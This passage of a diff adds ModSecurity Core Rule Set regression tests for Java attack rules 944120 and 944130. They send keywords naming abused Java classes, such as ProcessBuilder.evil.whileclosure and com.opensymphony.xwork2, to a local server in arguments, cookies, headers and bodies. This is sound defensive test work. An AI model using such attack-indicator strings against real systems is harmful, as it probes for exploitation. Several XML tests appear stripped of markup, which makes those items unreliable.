Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-111 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-112 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-113 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-114 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-115 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-116 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-117 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-118 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-119 + desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-120 + desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-121 + desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-122 + desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-123 + desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-124 + desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-125 + desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-126 + desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-127 + desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-128 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-129 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-130 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.whileclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-131 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.whileclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-132 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-133 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-134 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-135 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml new file mode 100644 index 000000000..defef163c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -0,0 +1,8481 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944130.yaml" + description: "Positive tests for rule 944130" +tests: + - test_title: 944130-0 + desc: "Argument test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-1 + desc: "Argument name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-2 + desc: "Cookie test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-3 + desc: "Cookie name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-4 + desc: "Request header test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-5 + desc: "XML attribute value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-6 + desc: "XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-7 + desc: "Nested XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-8 + desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-9 + desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-10 + desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-11 + desc: "Argument test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-12 + desc: "Argument name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-13 + desc: "Cookie test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-14 + desc: "Cookie name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-15 + desc: "Request header test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-16 + desc: "XML attribute value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: 